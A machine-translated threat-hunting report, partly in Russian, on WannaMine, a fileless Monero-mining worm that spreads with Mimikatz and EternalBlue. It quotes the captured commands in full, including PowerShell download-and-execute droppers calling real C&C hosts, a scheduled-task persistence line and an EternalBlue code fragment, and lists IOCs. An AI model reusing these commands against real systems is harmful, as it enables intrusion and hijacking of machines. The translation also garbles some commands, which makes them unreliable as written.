Threat Hunting: new file-free attack for crypto mining discovered
- Transfer
Fileless Monero WannaMine Cryptocurrency
mining (e.g. Bitcoin, Ethereum or Monero) is no longer a curiosity. Moreover, in recent years we have seen numerous attacks whose main goal was to install mining software. For example, do not forget that before the advent of WannaCry, we had already seen hackers who used the NSA's EternalBlue exploit to infiltrate companies and install this type of software on their victims' devices.
It is safe to say that this is a thriving business, as attack complexity continues to increase. A few days ago, we discovered a new worm that uses hacking tools and scripts to spread inside corporate networks with the subsequent goal of mining Monero cryptocurrency on any network where it happened to “gain a foothold”.
When the experts from the Threat Hunting service (in PandaLabs) discovered the following command trying to execute inside one of the processes on the computer, an “alarm” was immediately activated:
CMD / V: ON / C FOR / F “TOKENS = 2 DELIMS =. [ ”% I IN ('VER') DO (SET A =% I) & IF! A: ~ -1! == 5 ( ECHOON ERROR RESUME NEXT>% WINDIR% \ 11.VBS&@ECHO SET OX = CREATEOBJECT ^ (“MSXML2.XMLHTTP” ^) >>% WINDIR% \ 11.VBS&@ECHO OX.OPEN “GET”, ”HTTP: // STAFFTEST.FIREWALL-GATEWAY.COM:8000/INFO.VBSgent,FALSE>>%WINDIR%\11.VBS&@ECHO OX.SETREQUESTHEADER “USER-AGENT”, “-“ >>% WINDIR% \ 11.VBS&@ECHO OX.SEND ^ (^) >>% WINDIR% \ 11.VBS&@ECHO IF OX.STATUS = 200 THEN >>% WINDIR% \ 11.VBS&@ECHO SET OAS = CREATEOBJECT ^ (“ADODB.STREAM” ^)> >% WINDIR% \ 11.VBS&@ECHO OAS.OPEN >>% WINDIR% \ 11.VBS&@ECHO OAS.TYPE = 1 >>% WINDIR% \ 11.VBS&@ECHO OAS.WRITE OX.RESPONSEBODY >>% WINDIR % \ 11.VBS&@ECHO OAS.SAVETOFILE “% WINDIR% \ INFO.VBS”, 2 >>% WINDIR% \ 11.VBS&@ECHO OAS.CLOSE >>% WINDIR% \ 11.VBS&@ECHO END IF >> % WINDIR% \ 11.VBS&@ECHO SET OS = CREATEOBJECT ^ (“WSCRIPT.SHELL” ^) >>% WINDIR% \ 11.VBS&@ECHO OS.EXEC ^ (“CSCRIPT.EXE% WINDIR% \ INFO.VBS” ^) >>% WINDIR% \ 11.VBS & CSCRIPT.EXE% WINDIR% \ 11.VBS) ELSE (POWERSHELL -NOP -NONI -W HIDDEN “IF (( GET-WMIOBJECT WIN32_OPERATINGSYSTEM) .OSARCHITECTURE.CONTAINS ('64 ')) {IEX (NEW-OBJECT NET.WEBCLIENT) .DOWNLOADSTRING (' HTTP://STAFFTEST.FIREWALL-GATEWAY.COM:8000/INFOSEPS1)) {IEX (NEW-OBJECTNET.WEBCLIENT) .DOWNLOADSTRING ('HTTP://STAFFTEST.FIREWALL-GATEWAY.COM:8000/INFO3.PS1 ′)} “)
Анализ распространения в сети
Вскоре после начала расследования, мы стали наблюдать, как злоумышленники, зная, что они были обнаружены, закрыли серверы управления (C&C), но перед этим нам удалось скачать следующие файлы:
• B6FCD1223719C8F6DAF4AB7FBEB9A20A PS1 ~4МБ
• 27E4F61EE65668D4C9AB4D9BF5D0A9E7 VBS ~2МБ
Это два сильно запутанных скрипта. “Info6.ps1” загружает модуль Mimikatz (dll) в память (не трогая при этом жесткий диск) так, чтобы можно было осуществлять кражу регистрационных данных, которые позже будут использоваться для горизонтальных перемещений во внутренних (незащищенных) сетях.
Скрипт реализует в Powershell известный эксплойт NetBios, который известен также как EternalBlue(MS17-010), так что он может приступить к заражению в сети других, еще не пропатченных компьютеров с Windows.
$TARGET_HAL_HEAP_ADDR_X64 = 0XFFFFFFFFFFD00010
$TARGET_HAL_HEAP_ADDR_X86 = 0XFFDFF000
[BYTE[]]$FAKESRVNETBUFFERNSA = @(0X00,0X10,0X01,0X00,0X00
[BYTE[]]$FAKESRVNETBUFFERX64 = @(0X00,0X10,0X01,0X00,0X00
$FAKESRVNETBUFFER = $FAKESRVNETBUFFERNSA
[BYTE[]]$FEALIST=[BYTE[]](0X00,0X00,0X01,0X00)
$FEALIST += $NTFEA[$NTFEA_SIZE]
$FEALIST +=0X00,0X00,0X8F,0X00+ $FAKESRVNETBUFFER
$FEALIST +=0X12,0X34,0X78,0X56
[BYTE[]]$FAKE_RECV_STRUCT=@(0X00,0X00,0X00,0X00,0X00,0X00
В то же самое время он использует WMIfor remote execution of commands. After we got the passwords for the computer, we see the process “wmiprvse.exe” on this computer and the command line
runs like the following: POWERSHELL.EXE -NOP -NONI -W HIDDEN -E JABZAHQAAQBTAGUAPQBBAEUABGB2AGKACGBVAG4ABQBLAG4AD ... ”
If we decode“ base 64 of this command line, we will get the script presented in Appendix I.
"Survivability" in the system
In one of the scripts you can find the following command, which allows to ensure the "survivability" of the threat in the system:
CMD / C ECHO POWERSHELL -NOP “$ A = ([STRING] (GET-WMIOBJECT -NAMESPACE ROOT \ SUBSCRIPTION -CLASS __FILTERTOCONSUMERBINDING)); IF (($ A -EQ $ NULL) -OR (! ($ A.CONTAINS ( 'SCM EVENT FILTER')))) {IEX (NEW-OBJECT NET.WEBCLIENT) .DOWNLOADSTRING ('HTTP://STAFFTEST.SPDNS.EU:8000/MATE6.PS1')} ”>% TEMP% \ Y1.BAT && SCHTASKS / CREATE / RU SYSTEM / SC DAILY / TN YASTCAT / F / TR “% TEMP% \ Y1.BAT” && SCHTASKS / RUN / TN YASTCAT
As you can see, it programs the daily task of downloading and running the file “y1.bat "
Please note that we do not have this file, because management servers are currently offline.
Vector of infection
We still do not know the initial vector of infection, because networks in which the infection was detected and blocked were in the process of implementing the solutionAdaptive Defense , but because at that time not all the network was protected by this solution with advanced information security options. For this reason, we were unable to determine who was the “null patient” and how he was compromised.
Among the possible options it may be downloading / executing a file / trojan that first activated the worm, or it could be executed remotely using some kind of exploit.
Management Servers
From the script “info6.ps1” we were able to determine the data of the management servers.
• spdns.eu
• firewall-gateway.com
• 179.67.243
• 184.48.95
Note that these servers stopped working on October 27, 2017
118.184.48.95
107.179.67.243
stafftest.spdns.eu
stafftest.firewall-gateway.com
IOC
• exe (Monero, MD5 2ad7a39b17d08b3a685d36a23bf8d196)
•% windir% \ 11.vbs
•% windir% \ info.vbs
•% windir% \ info6.ps1
• dll
• dll
• Tarea programada “yastcat”
• spdns.eu
• firewall-gateway.com
• 179.67.243
• 184.48.95
Conclusion
Once again we are witnessing the professionalization of increasingly sophisticated attacks. Even when it comes to installing Monero miners (and we leave aside data theft, sabotage or espionage), attackers use advanced techniques and special tactics. In fact, this is a fileless attack.As a result, most of the traditional anti-virus solutions are barely able to detect it, much less react to it somehow, and its victims can only wait for the generation of the necessary signatures (the attack is file-free, although, as we saw at the beginning, the scripts and the Monero client are loaded) .
But these signatures will refer only to a specific attack, and therefore, even at the slightest change, they will be useless, not to mention the fact that only the result of the attack (its final stage) is detected, but it is not visible how the attack develops in the network and how computers are compromised.
Since the latest generation of security solutions not only classifies all running processes on each computer, it is possible to monitor the entire network in real time, which becomes an absolute necessity, as hackers resort to harmless techniques in which they abuse completely legitimate system utilities.
Observing all processes, we can find the following events:
• Creation of a process and remote code injection
• Creation, modification and opening of files
• Creation and modification of entries in the registry
• Network events (communication aperture, file loading, etc.)
• Administrative events (creation users, etc.)